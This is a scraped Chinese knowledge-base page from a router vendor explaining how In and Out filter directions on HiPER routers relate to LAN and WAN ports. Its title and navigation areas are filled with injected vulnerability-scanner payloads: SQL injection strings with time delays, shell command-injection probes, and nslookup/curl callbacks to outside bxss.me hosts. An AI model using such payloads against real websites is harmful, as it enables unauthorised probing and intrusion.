-1' OR 374=374 or 'mF5u9TGo'=' - 知识库文章-艾泰科技

产品中心

企业级路由器

echo vzcrma$()\ skxhiw\nz^xyu||a #' &echo vzcrma$()\ skxhiw\nz^xyu||a #|" &echo vzcrma$()\ skxhiw\nz^xyu||a #

&echo epttrz$()\ sbvgba\nz^xyu||a #' &echo epttrz$()\ sbvgba\nz^xyu||a #|" &echo epttrz$()\ sbvgba\nz^xyu||a #

lxbfYeaa&echo roixkv$()\ pqhifg\nz^xyu||a #' &echo roixkv$()\ pqhifg\nz^xyu||a #|" &echo roixkv$()\ pqhifg\nz^xyu||a #

|echo vaxfto$()\ bfpegd\nz^xyu||a #' |echo vaxfto$()\ bfpegd\nz^xyu||a #|" |echo vaxfto$()\ bfpegd\nz^xyu||a #

lxbfYeaa|echo xwnjui$()\ cfxjwx\nz^xyu||a #' |echo xwnjui$()\ cfxjwx\nz^xyu||a #|" |echo xwnjui$()\ cfxjwx\nz^xyu||a #

expr 9000750623 - 977544

(nslookup -q=cname hitxhxuagstyq35058.bxss.me||curl hitxhxuagstyq35058.bxss.me))

$(nslookup -q=cname hitspufvnrtis0220d.bxss.me||curl hitspufvnrtis0220d.bxss.me)

&nslookup -q=cname hitysfpkbnuke1e268.bxss.me&'\"`0&nslookup -q=cname hitysfpkbnuke1e268.bxss.me&`'

&(nslookup -q=cname hitriplecwmlj68c71.bxss.me||curl hitriplecwmlj68c71.bxss.me)&'\"`0&(nslookup -q=cname hitriplecwmlj68c71.bxss.me||curl hitriplecwmlj68c71.bxss.me)&`'

|(nslookup -q=cname hitqoizootwzud653e.bxss.me||curl hitqoizootwzud653e.bxss.me)

lxbfYeaa'&&sleep(27*1000)*rqcaap&&'

`(nslookup -q=cname hitmkjimoufyj09ec8.bxss.me||curl hitmkjimoufyj09ec8.bxss.me)`

;(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)|(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)&(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)

lxbfYeaa"&&sleep(27*1000)*sbpckp&&"

|(nslookup${IFS}-q${IFS}cname${IFS}hitclfiuqdslv37310.bxss.me||curl${IFS}hitclfiuqdslv37310.bxss.me)

lxbfYeaa'||sleep(27*1000)*yvlczf||'

&(nslookup${IFS}-q${IFS}cname${IFS}hitljbybigsfb143fe.bxss.me||curl${IFS}hitljbybigsfb143fe.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitljbybigsfb143fe.bxss.me||curl${IFS}hitljbybigsfb143fe.bxss.me)&`'

lxbfYeaa"||sleep(27*1000)*lqcltm||"

企业级无线路由器

lxbfYeaabuRDC5lu

lxbfYeaa' AND 2*3*8=6*8 AND 'uMxp'='uMxp

lxbfYeaa" AND 2*3*8=6*8 AND "ZJo6"="ZJo6

lxbfYeaa%' AND 2*3*8=6*8 AND 'z8Cx'!='z8Cx%

lxbfYeaahYG8jINu'; waitfor delay '0:0:15' --

lxbfYeaahpo5yDZB' OR 201=(SELECT 201 FROM PG_SLEEP(15))--

lxbfYeaaIYsp9IZ5') OR 930=(SELECT 930 FROM PG_SLEEP(15))--

lxbfYeaa8SuFVq1W')) OR 630=(SELECT 630 FROM PG_SLEEP(15))--

@@U4Q9C

lxbfYeaa'"()&%

lxbfYeaa'"()&%

'"()&%

'"()&%

lxbfYeaa9884590

lxbfYeaa9438988

lxbfYeaa'"()&%

'"()&%

lxbfYeaa9932083

1FBAOSFMA3G0

xfs.bxss.me

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'"

知识库与软件

-1' OR 374=374 or 'mF5u9TGo'='

文档编号:571
浏览:6886 评分:22
最后更新于:2009-12-24

Filer方向

Filter的方向包括进入和外出，在HiPER中分别用“In”和“Out”来表示，Filter方向用来指出是在数据包进入或离开HiPER时对其进行过滤。Filter的方向与数据流方向、及其应用端口（物理端口或虚端口）密切相关，它们的涵义如下：

进入（In）— 当数据包从指定端口进入HiPER时执行过滤。数据包来自与指定端口相连的网络，希望穿过HiPER到达另一端口并转发。当指定端口接收到数据包之后，将首先进行Filter策略的匹配检查，如果有匹配策略，且该策略定义的动作是转发，那么将对该数据包进行路由处理；否则将直接丢弃该数据包。

外出（Out）— 当数据包从指定端口离开HiPER时执行过滤。数据包来自与另一端口相连的网络，已经穿过HiPER到达指定端口，并希望从该端口转发。当指定端口接收到数据包之后，将进行Filter策略的匹配检查，并根据匹配策略定义的动作处理该数据包：转发或丢弃。

以下将通过两个实例来说明Filter方向与数据流方向、以及应用端口的关系，如图1、2所示。图1、2中，都是通过HiPER连接两个网络：网络A和网络B，其中，LAN口连接到网络A，WAN口连接到网络B。

图1：Filter方向示意图1

如图1所示，如果要求过滤从网络A发起经过HiPER转发到网络B的流量，那么，从HiPER的LAN口来看，是接收到数据包；而从WAN口来看，则是发送数据包。因此，当在LAN口启用Filter功能时，其方向需定义为In；当在WAN口启用Filter功能时，其方向需定义为Out。

图2：Filter方向示意图2

如图2所示，如果要求过滤从网络B发起经过HiPER转发到网络A的流量，那么，从HiPER的WAN口来看，是接收到数据包；而从LAN口来看，则是发送数据包。因此，当在WAN口启用Filter功能时，其方向需定义为In；当在LAN口启用Filter功能时，其方向需定义为Out。

由上可以看出，Filter方向为 In或Out，将导致在HiPER内部是先进行路由处理还是先进行Filter匹配检查。Filter方向为In时，HiPER将首先进行Filter策略的匹配检查，再进行路由处理。Filter方向为Out时，HiPER是先进行路由处理选择外出接口，再在该接口进行Filter策略的匹配检查。因此，一般情况下，为了提高HiPER的效率，避免对将被丢弃的数据包进行路由处理，建议将Filter应用于与数据包源端所在网络相连（靠近）的接口，此时Filter方向为In。

提示：

一般情况下，由于HiPER会启用NAT功能，所有的局域网计算机将仅使用一个或几个公网地址连接到Internet，因此，通常都是过滤从企业内部局域网到Internet的流量。同时，由于一般都是LAN口接局域网，因此通常都是在LAN口启用Filter，其方向为In。

解决方案
更多成功案例

关注艾泰

微博 · 企业版
微信 · 公众平台
艾泰艾网络APP

行业解决方案

案例解析

技术与支持

服务